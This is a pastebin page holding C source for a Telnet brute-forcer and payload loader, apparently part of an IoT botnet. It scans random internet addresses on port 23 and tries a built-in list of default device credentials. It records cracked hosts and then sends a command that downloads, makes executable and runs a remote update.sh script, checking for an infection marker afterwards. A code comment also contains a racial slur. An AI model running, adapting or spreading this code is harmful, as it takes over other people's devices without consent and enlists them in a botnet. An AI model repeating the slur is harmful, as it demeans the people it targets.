Untitled

mail@pastecode.io avatar
unknown
python
2 years ago
26 kB
1
Indexable
Never
// Telnet bruter + Payload loader v 2.4.1
// Build date 05/07/2018

#include <stdarg.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <strings.h>
#include <string.h>
#include <unistd.h>
#include <dirent.h>
#include <poll.h>
#include <netdb.h>
#include <time.h>
#include <net/if.h>
#include <sys/wait.h>
#include <sys/time.h>
#include <sys/ioctl.h>
#include <arpa/inet.h>
#include <sys/socket.h>
#include <netinet/ip.h>
#include <netinet/in.h>
#include <netinet/tcp.h>
#include <netinet/udp.h>
#include <resolv.h>
//amp setting
#define MAX_PACKET_SIZE 1024
#define PHI 0x9e3779b9
 
//telnet scanner stuff
#define BUFFER_SIZE 1024
#define CMD_IAC   255
#define CMD_WILL  251
#define CMD_WONT  252
#define CMD_DO    253
#define CMD_DONT  254
 
#define PAD_RIGHT 1
#define PAD_ZERO 2
#define PRINT_BUF_LEN 12
 
#define OPT_SGA   3
#define SOCKBUF_SIZE 1024
 
 
// Telnet scanner payload, must end with \r\n\0
char *rekdevice = "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://0.0.0.0/update.sh; busybox wget http://0.0.0.0/update.sh; tftp -r update.sh -g 0.0.0.0; busybox tftp -r update.sh -g 0.0.0.0; ftpget -v -u anonymous -p anonymous -P 21 0.0.0.0 update.sh update.sh; busybox ftpget -v -u anonymous -p anonymous -P 21 0.0.0.0 update.sh update.sh; chmod 777 update.sh; busybox chmod 777 update.sh; sh update.sh; rm -rf update.sh\r\n\0";
 
char *usernames[] = {
    "\0",
    "root\0",
    "root\0",
    "root\0",
    "root\0",
    "root\0",
    "root\0",
    "root\0",
    "root\0",
    "root\0",
    "root\0",
    "root\0",
    "root\0",
    "root\0",
    "root\0",
    "root\0",
    "root\0",
    "root\0",
    "root\0",
    "root\0",
    "root\0",
    "root\0",
    "root\0",
    "root\0",
    "root\0",
    "root\0",
    "root\0",
    "root\0",
    "root\0",
    "admin\0",
    "admin\0",
    "admin\0",
    "admin\0",
    "admin\0",
    "admin\0",
    "admin\0",
    "admin\0",
    "admin\0",
    "admin\0",
    "admin\0",
    "admin\0",
    "admin\0",
    "admin\0",
    "admin\0",
    "admin\0",
    "admin\0",
    "admin\0",
    "admin\0",
    "admin\0",
    "admin\0",
    "guest\0",
    "guest\0",
    "guest\0",
    "guest\0",
    "guest\0",
    "guest\0",
    "guest\0",
    "root\0",
    "admin\0",
    "root\0",
    "default\0",
    "user\0",
    "guest\0",
    "daemon\0",
    "admin\0",
    "admin\0",
    "root\0",
    "admin\0",
    "adm\0",
    "guest\0",
    "root\0",
    "root\0",
    "telnet\0",
    "root\0",
    "admin\0",
    "admin\0",
    "Administrator\0",
    "root\0",
    "mg3500\0",
    "admin\0",
    "admin\0",
    "admin\0",
    "admin\0",
    "admin\0",
    "admin\0",
    "default\0",
    "admin\0",
    "admin\0",
    "admin\0",
    "root\0",
    "root\0",
    "root\0",
    "root\0",
    "admin1\0",
    "ubnt\0",
    "support\0",
    "root\0",
    "user\0",
    "guest\0"
};
 
char *passwords[] = {
    "\0",
    "root\0",
    "password\0",
    "\0",
    "Zte521\0",
    "vizxv\0",
    "000000\0",
    "14567\0",
    "hi3518\0",
    "user\0",
    "pass\0",
    "admin14\0",
    "7ujMko0admin\0",
    "00000000\0",
    "<>\0",
    "klv1\0",
    "klv14\0",
    "oelinux1\0",
    "realtek\0",
    "1111\0",
    "54321\0",
    "antslq\0",
    "zte9x15\0",
    "system\0",
    "1456\0",
    "888888\0",
    "ikwb\0",
    "default\0",
    "juantech\0",
    "xc3511\0",
    "support\0",
    "1111111\0",
    "service\0",
    "145\0",
    "4321\0",
    "tech\0",
    "<>\0",
    "abc1\0",
    "7ujMko0admin\0",
    "switch\0",
    "admin14\0",
    "\0",
    "1111\0",
    "meinsm\0",
    "pass\0",
    "smcadmin\0",
    "14567890\0",
    "14\0",
    "admin1\0",
    "password\0",
    "admin\0",
    "anko\0",
    "xc3511\0",
    "1456\0",
    "\0",
    "guest\0",
    "145\0",
    "xc3511\0",
    "admin\0",
    "Zte521\0",
    "\0",
    "user\0",
    "guest\0",
    "\0",
    "password\0",
    "admin1\0",
    "ikwb\0",
    "14567890\0",
    "\0",
    "\0",
    "1456\0",
    "root\0",
    "telnet\0",
    "zte9x15\0",
    "meinsm\0",
    "\0",
    "\0",
    "antslq\0",
    "merlin\0",
    "switch\0",
    "7ujMko0admin\0",
    "abc1\0",
    "<>\0",
    "tech\0",
    "4321\0",
    "default\0",
    "145\0",
    "service\0",
    "1111111\0",
    "admin14\0",
    "pass\0",
    "user\0",
    "hi3518\0",
    "password\0",
    "ubnt\0",
    "zlxx.\0",
    "14567\0",
    "000000\0"
};
 
char *advances[] = {
    ":",
    "ser",
    "ogin",
    "name",
    "pass",
    "dvrdvs",
    (char *) 0
};
char *fails[] = {
    "nvalid",
    "ailed",
    "ncorrect",
    "enied",
    "error",
    "goodbye",
    "bad",
    "timeout",
    (char *) 0
};
char *successes[] = {
    "$",
    "#",
    ">",
    "@",
    "shell",
    "dvrdvs",
    "usybox",
    (char *) 0
};
char *advances2[] = {
    ":",
    "nvalid",
    "ailed",
    "ncorrect",
    "enied",
    "rror",
    "oodbye",
    "bad",
    "busybox",
    "$",
    "#",
    (char *) 0
};
char *legit[] = {
    "AK47",
    (char *) 0
};
char *infected[] = {
    "CAPSAICIN",
    (char *) 0
};
 
int scanPid = 0;
 
struct telstate_t {
    int fd;
    unsigned int ip;
    unsigned char state;
    unsigned char complete;
    unsigned char usernameInd; /* username     */
    unsigned char passwordInd; /* password     */
    unsigned int totalTimeout; /* totalTimeout */
    char *sockbuf;
};
 
struct ipstate_t {
    int fd;
    unsigned int ip;
    unsigned char state;
    unsigned char complete;
    unsigned char usernameInd;
    unsigned char passwordInd;
    unsigned int totalTimeout;
    unsigned int telPort;
    char *sockbuf;
};
 
static uint32_t Q[4096], c = 362436;
 
void init_rand(uint32_t x)
{
    int i;
    Q[0] = x;
    Q[1] = x + PHI;
    Q[2] = x + PHI + PHI;
    for (i = 3; i < 4096; i++)
    Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;
}
 
uint32_t rand_cmwc(void)
{
    uint64_t t, a = 18782LL;
    static uint32_t i = 4095;
    uint32_t x, r = 0xfffffffe;
    i = (i + 1)&4095;
    t = a * Q[i] + c;
    c = (t >> 32);
    x = t + c;
    if(x < c) {
        x++;
        c++;
    }
    return (Q[i] = r - x);
}
 
static void printchar(unsigned char ** str, int c) {
    if (str) { **
        str = c;
        ++( * str);
    } else(void) write(1,&c, 1);
}
static int prints(unsigned char ** out,
    const unsigned char *string, int width, int pad) {
    register int pc = 0, padchar = ' ';
    if (width > 0) {
        register int len = 0;
        register
        const unsigned char *ptr;
        for (ptr = string;* ptr; ++ptr) ++len;
        if (len >= width) width = 0;
        else width -= len;
        if (pad&PAD_ZERO) padchar = '0';
    }
    if (!(pad&PAD_RIGHT)) {
        for (; width > 0; --width) {
            printchar(out, padchar);
            ++pc;
        }
    }
    for (;* string; ++string) {
        printchar(out, * string);
        ++pc;
    }
    for (; width > 0; --width) {
        printchar(out, padchar);
        ++pc;
    }
    return pc;
}
static int printi(unsigned char ** out, int i, int b, int sg, int width, int pad, int letbase) {
    unsigned char print_buf[PRINT_BUF_LEN];
    register unsigned char *s;
    register int t, neg = 0, pc = 0;
    register unsigned int u = i;
    if (i == 0) {
        print_buf[0] = '0';
        print_buf[1] = '\0';
        return prints(out, print_buf, width, pad);
    }
    if (sg && b == 10 && i < 0) {
        neg = 1;
        u = -i;
    }
 
    s = print_buf + PRINT_BUF_LEN - 1;
    * s = '\0';
    while (u) {
        t = u % b;
        if (t >= 10)
            t += letbase - '0' - 10;
        *--s = t + '0';
        u /= b;
    }
    if (neg) {
        if (width && (pad&PAD_ZERO)) {
            printchar(out, '-');
            ++pc;
            --width;
        } else {
            *--s = '-';
        }
    }
 
    return pc + prints(out, s, width, pad);
}
static int print(unsigned char ** out,
    const unsigned char *format, va_list args) {
    register int width, pad;
    register int pc = 0;
    unsigned char scr[2];
    for (;* format != 0; ++format) {
        if ( * format == '%') {
            ++format;
            width = pad = 0;
            if ( * format == '\0') break;
            if ( * format == '%') goto out;
            if ( * format == '-') {
                ++format;
                pad = PAD_RIGHT;
            }
            while ( * format == '0') {
                ++format;
                pad |= PAD_ZERO;
            }
            for (;* format >= '0' && * format <= '9'; ++format) {
                width *= 10;
                width += * format - '0';
            }
            if ( * format == 's') {
                register char *s = (char *) va_arg(args, int);
                pc += prints(out, s ? s : "(null)", width, pad);
                continue;
            }
            if ( * format == 'd') {
                pc += printi(out, va_arg(args, int), 10, 1, width, pad, 'a');
                continue;
            }
            if ( * format == 'x') {
                pc += printi(out, va_arg(args, int), 16, 0, width, pad, 'a');
                continue;
            }
            if ( * format == 'X') {
                pc += printi(out, va_arg(args, int), 16, 0, width, pad, 'A');
                continue;
            }
            if ( * format == 'u') {
                pc += printi(out, va_arg(args, int), 10, 0, width, pad, 'a');
                continue;
            }
            if ( * format == 'c') {
                scr[0] = (unsigned char) va_arg(args, int);
                scr[1] = '\0';
                pc += prints(out, scr, width, pad);
                continue;
            }
        } else {
            out: printchar(out, * format);
            ++pc;
        }
    }
    if (out) ** out = '\0';
    va_end(args);
    return pc;
}
 
int szprintf(unsigned char *out,
    const unsigned char *format, ...) {
    va_list args;
    va_start(args, format);
    return print(&out, format, args);
}
 
char *thanks = "thanks to unhappygh0st for the honeypot ip ranges :)";
 
in_addr_t getDatIP() {
    uint8_t ipState[4] = {
        0
    };
    ipState[0] = rand() % 255;
    ipState[1] = rand() % 255;
    ipState[2] = rand() % 255;
    ipState[3] = rand() % 255;
 
    while (
        (ipState[0] == 0) ||
        (ipState[0] == 10) ||
        (ipState[0] == 100 && (ipState[1] >= 64 && ipState[1] <= 127)) ||
        (ipState[0] == 127) ||
        (ipState[0] == 169 && ipState[1] == 254) ||
        (ipState[0] == 172 && (ipState[1] <= 16 && ipState[1] <= 31)) ||
        (ipState[0] == 192 && ipState[1] == 0 && ipState[2] == 2) ||
        (ipState[0] == 192 && ipState[1] == 88 && ipState[2] == 99) ||
        (ipState[0] == 192 && ipState[1] == 168) ||
        (ipState[0] == 198 && (ipState[1] == 18 || ipState[1] == 19)) ||
        (ipState[0] == 198 && ipState[1] == 51 && ipState[2] == 100) ||
        (ipState[0] == 203 && ipState[1] == 0 && ipState[2] == 113) ||
        (ipState[0] == 62 && ipState[1] <= 30) || //Honeypot
        (ipState[0] == 207 && ipState[1] >= 31 && ipState[2] <= 120) || //FBI Honeypots (207.31.0.0 - 207.120.255.255) 
        (ipState[0] == 65) && (ipState[1] >= 224) && (ipState[2] <= 226) || // More FBI Honeypots (64.224.0.0 - 64.226.255.255)
        (ipState[0] == 195) && (ipState[1] == 10) || //Yet another FBI Honeypot. 
        (ipState[0] == 216) && (ipState[1] == 25 || ipState[1] == 94) || //Fucking nigger LOL (FBI Honeypots)
        (ipState[0] == 212) && (ipState[1] == 56) || //The fuck?! 212.56.107.22 - uhhhhm. FBI Honeypot. 
        (ipState[0] >= 224) && (ipState[0] <= 239) //Multicast ip ranges
    ) {
        ipState[0] = rand() % 255;
        ipState[1] = rand() % 255;
        ipState[2] = rand() % 255;
        ipState[3] = rand() % 255;
    }
 
    char ip[16] = {
        0
    };
    szprintf(ip, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);
    return inet_addr(ip);
}
int negotiate(int sock, unsigned char *buf, int len) {
    unsigned char c;
    switch (buf[1]) {
    case CMD_IAC:
        return 0;
    case CMD_WILL:
    case CMD_WONT:
    case CMD_DO:
    case CMD_DONT:
        c = CMD_IAC;
        send(sock,&c, 1, MSG_NOSIGNAL);
        if (CMD_WONT == buf[1]) c = CMD_DONT;
        else if (CMD_DONT == buf[1]) c = CMD_WONT;
        else if (OPT_SGA == buf[1]) c = (buf[1] == CMD_DO ? CMD_WILL : CMD_DO);
        else c = (buf[1] == CMD_DO ? CMD_WONT : CMD_DONT);
        send(sock,&c, 1, MSG_NOSIGNAL);
        send(sock,&(buf[2]), 1, MSG_NOSIGNAL);
        break;
    default:
        break;
    }
 
    return 0;
}
 
int contains_string(char *buffer, char ** strings) {
    int num_strings = 0, i = 0;
    for (num_strings = 0; strings[++num_strings] != 0;);
    for (i = 0; i < num_strings; i++) {
        if (strcasestr(buffer, strings[i])) {
            return 1;
        }
    }
    return 0;
}
int contains_success(char *buffer) {
    return contains_string(buffer, successes);
}
int contains_fail(char *buffer) {
    return contains_string(buffer, fails);
}
int contains_response(char *buffer) {
    return contains_success(buffer) || contains_fail(buffer);
}
int read_with_timeout(int fd, int timeout_usec, char *buffer, int buf_size) {
    fd_set read_set;
    struct timeval tv;
    tv.tv_sec = 0;
    tv.tv_usec = timeout_usec;
    FD_ZERO(&read_set);
    FD_SET(fd,&read_set);
    if (select(fd + 1,&read_set, NULL, NULL,&tv) < 1)
        return 0;
    return recv(fd, buffer, buf_size, 0);
}
int read_until_response(int fd, int timeout_usec, char *buffer, int buf_size, char ** strings) {
    int num_bytes, i;
    memset(buffer, 0, buf_size);
    num_bytes = read_with_timeout(fd, timeout_usec, buffer, buf_size);
    if (&buffer[0] == "\xFF") {
        negotiate(fd, buffer, 3);
    }
 
    if (contains_string(buffer, strings)) {
        return 1;
    }
 
    return 0;
}
const char *get_telstate_host(struct telstate_t * telstate) { // get host
    struct in_addr in_addr_ip;
    in_addr_ip.s_addr = telstate->ip;
    return inet_ntoa(in_addr_ip);
}
void advance_telstate(struct telstate_t * telstate, int new_state) { // advance
    if (new_state == 0) {
        close(telstate->fd);
    }
    telstate->totalTimeout = 0;
    telstate->state = new_state;
    memset((telstate->sockbuf), 0, SOCKBUF_SIZE);
}
void reset_telstate(struct telstate_t * telstate) { // reset
    advance_telstate(telstate, 0);
    telstate->complete = 1;
}
int sclose(int fd) {
    if (3 > fd) return 1;
    close(fd);
    return 0;
}
void ak47telscan(int wait_usec, int maxfds) {
    int i, res, num_tmps, j;
    char buf[128], cur_dir;
 
    int max = maxfds;
    fd_set fdset;
    struct timeval tv;
    socklen_t lon;
    int valopt;
 
    srand(time(NULL) ^ rand_cmwc());
 
    char line[256];
    char *buffer;
    struct sockaddr_in dest_addr;
    dest_addr.sin_family = AF_INET;
    dest_addr.sin_port = htons(23);
    memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
 
    buffer = malloc(BUFFER_SIZE + 1);
    memset(buffer, 0, BUFFER_SIZE + 1);
 
    struct telstate_t fds[max];
 
    memset(fds, 0, max * (sizeof(int) + 1));
    for (i = 0; i < max; i++) {
        memset(&(fds[i]), 0, sizeof(struct telstate_t));
        fds[i].complete = 1;
        fds[i].sockbuf = buffer;
    }
 
    while (1) {
        for (i = 0; i < max; i++) {
            if (fds[i].totalTimeout == 0) {
                fds[i].totalTimeout = time(NULL);
            }
 
            switch (fds[i].state) {
            case 0:
                {
                    if (fds[i].complete == 1) {
                        // clear the current fd
                        char *tmp = fds[i].sockbuf;
                        memset(&(fds[i]), 0, sizeof(struct telstate_t));
                        fds[i].sockbuf = tmp;
                        // get a new random ip
                        fds[i].ip = getDatIP();
                    } else if (fds[i].complete == 0) {
                        fds[i].passwordInd++;
                        fds[i].usernameInd++;
 
                        if (fds[i].passwordInd == sizeof(passwords) / sizeof(char *)) {
                            fds[i].complete = 1;
                            continue;
                        }
                        if (fds[i].usernameInd == sizeof(usernames) / sizeof(char *)) {
                            fds[i].complete = 1;
                            continue;
                        }
                    }
 
                    dest_addr.sin_family = AF_INET;
                    dest_addr.sin_port = htons(23);
                    memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
                    dest_addr.sin_addr.s_addr = fds[i].ip;
 
                    fds[i].fd = socket(AF_INET, SOCK_STREAM, 0);
 
                    if (fds[i].fd == -1) continue;
 
                    fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) | O_NONBLOCK);
 
                    if (connect(fds[i].fd, (struct sockaddr * )&dest_addr, sizeof(dest_addr)) == -1 && errno != EINPROGRESS) {
                        reset_telstate(&fds[i]);
                    } else {
                        advance_telstate(&fds[i], 1);
                    }
                }
                break;
            case 1:
                {
                    printf("[AK-47] FOUND ---> %s:23\n", get_telstate_host(&fds[i]));
                    FD_ZERO(&fdset);
                    FD_SET(fds[i].fd,&fdset);
                    tv.tv_sec = 0;
                    tv.tv_usec = wait_usec;
                    res = select(fds[i].fd + 1, NULL,&fdset, NULL,&tv);
 
                    if (res == 1) {
                        lon = sizeof(int);
                        valopt = 0;
                        getsockopt(fds[i].fd, SOL_SOCKET, SO_ERROR, (void * )(&valopt),&lon);
                        //printf("%d\n",valopt);
                        if (valopt) {
                            reset_telstate(&fds[i]);
                        } else {
                            fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL)&(~O_NONBLOCK));
                            advance_telstate(&fds[i], 2);
                        }
                        continue;
                    } else if (res == -1) {
                        reset_telstate(&fds[i]);
                        continue;
                    }
 
                    if (fds[i].totalTimeout + 5 < time(NULL)) {
                        reset_telstate(&fds[i]);
                    }
                }
                break;
 
            case 2:
                {
                    if (read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, BUFFER_SIZE, advances)) {
                        if (contains_fail(fds[i].sockbuf)) {
                            advance_telstate(&fds[i], 0);
                        } else {
                            advance_telstate(&fds[i], 3);
                        }
 
                        continue;
                    }
 
                    if (fds[i].totalTimeout + 7 < time(NULL)) {
                        reset_telstate(&fds[i]);
                    }
                }
                break;
 
            case 3:
                {
                    if (send(fds[i].fd, usernames[fds[i].usernameInd], strlen(usernames[fds[i].usernameInd]), MSG_NOSIGNAL) < 0) {
                        reset_telstate(&fds[i]);
                        continue;
                    }
 
                    if (send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0) {
                        reset_telstate(&fds[i]);
                        continue;
                    }
 
                    advance_telstate(&fds[i], 4);
                }
                break;
 
            case 4:
                {
                    if (read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, BUFFER_SIZE, advances)) {
                        if (contains_fail(fds[i].sockbuf)) {
                            advance_telstate(&fds[i], 0);
                        } else {
                            advance_telstate(&fds[i], 5);
                        }
                        continue;
                    }
 
                    if (fds[i].totalTimeout + 3 < time(NULL)) {
                        reset_telstate(&fds[i]);
                    }
                }
                break;
 
            case 5:
                {
                    if (send(fds[i].fd, passwords[fds[i].passwordInd], strlen(passwords[fds[i].passwordInd]), MSG_NOSIGNAL) < 0) {
                        reset_telstate(&fds[i]);
                        continue;
                    }
 
                    if (send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0) {
                        reset_telstate(&fds[i]);
                        continue;
                    }
                    advance_telstate(&fds[i], 6);
                }
                break;
 
            case 6:
                {
                    if (read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, BUFFER_SIZE, advances2)) {
                        fds[i].totalTimeout = time(NULL);
 
                        if (contains_fail(fds[i].sockbuf)) {
                            advance_telstate(&fds[i], 0);
                        } else if (contains_success(fds[i].sockbuf)) {
                            if (fds[i].complete == 2) {
                                advance_telstate(&fds[i], 7);
                            } else {
                                printf("[AK-47] [-] CRACKED ---> %s:23 %s:%s\n", get_telstate_host(&fds[i]), usernames[fds[i].usernameInd], passwords[fds[i].passwordInd]);
                                char command[1024];
                                sprintf(command, "echo '%s:23 %s:%s' >> cracked.txt", get_telstate_host(&fds[i]), usernames[fds[i].usernameInd],  passwords[fds[i].passwordInd]);
                                system(command);
                                advance_telstate(&fds[i], 7);
                            }
                        } else {
                            reset_telstate(&fds[i]);
                        }
                        continue;
                    }
 
                    if (fds[i].totalTimeout + 7 < time(NULL)) {
                        reset_telstate(&fds[i]);
                    }
                }
                break;
            case 7:
                {
                    fds[i].totalTimeout = time(NULL);
                    if (send(fds[i].fd, "enable\r\n", 8, MSG_NOSIGNAL) < 0) {
                        sclose(fds[i].fd);
                        fds[i].state = 0;
                        fds[i].complete = 1;
                        continue;
                    }
                    if (send(fds[i].fd, "system\r\n", 8, MSG_NOSIGNAL) < 0) {
                        sclose(fds[i].fd);
                        fds[i].state = 0;
                        fds[i].complete = 1;
                        continue;
                    }
                    if (send(fds[i].fd, "shell\r\n", 7, MSG_NOSIGNAL) < 0) {
                        sclose(fds[i].fd);
                        fds[i].state = 0;
                        fds[i].complete = 1;
                        continue;
                    }
                    if (send(fds[i].fd, "sh\r\n", 4, MSG_NOSIGNAL) < 0) {
                        sclose(fds[i].fd);
                        fds[i].state = 0;
                        fds[i].complete = 1;
                        continue;
                    }
                    if(send(fds[i].fd, "echo -e '\\x41\\x4b\\x34\\x37'", 26, MSG_NOSIGNAL) < 0) {
                        sclose(fds[i].fd);
                        fds[i].state = 0;
                        fds[i].complete = 1;
                        continue;
                    }
                    if (read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, SOCKBUF_SIZE, legit)) {
                        if (send(fds[i].fd, rekdevice, strlen(rekdevice), MSG_NOSIGNAL) > 0) {
                            printf("[AK-47] [-] PAYLOAD SENT ---> %s:23 %s:%s\n", inet_ntoa( * (struct in_addr * )&(fds[i].ip)), usernames[fds[i].usernameInd], passwords[fds[i].passwordInd]);
                            reset_telstate(&fds[i]);
                        }
                        sleep(20);
                        if (read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, SOCKBUF_SIZE, infected)) {
                            printf("[AK-47] [+] SUCCESSFUL INFECTION ---> %s:23 %s:%s\n", inet_ntoa( * (struct in_addr * )&(fds[i].ip)), usernames[fds[i].usernameInd], passwords[fds[i].passwordInd]);
                            reset_telstate(&fds[i]);
                            continue;
                        }
                        if (fds[i].totalTimeout + 60 < time(NULL)) {
                            if (fds[i].complete != 3) {
                                printf("[AK-47] [-] FAILED TO INFECT ---> %s:23 %s:%s\n", get_telstate_host(&fds[i]), usernames[fds[i].usernameInd], passwords[fds[i].passwordInd]);
                            }
                            reset_telstate(&fds[i]);
                        }
                    }
                    break;
                }
            }
        }
    }
}
 
int main(int argc, char **argv) {
    uint32_t parent;
    parent = fork();
    int forks = sysconf(_SC_NPROCESSORS_ONLN);
    int fds = forks * 512; //Far effective. 512 sockets for each CPU.
    if (parent > 0) {
        scanPid = parent;
        return 0;
    } else if (parent == -1) return 1;
    int ii;
    for (ii = 0; ii < forks; ii++) {
        srand((time(NULL) ^ getpid()) + getppid());
        init_rand(time(NULL) ^ getpid());
        ak47telscan(370, fds);
    }
    return 0;
}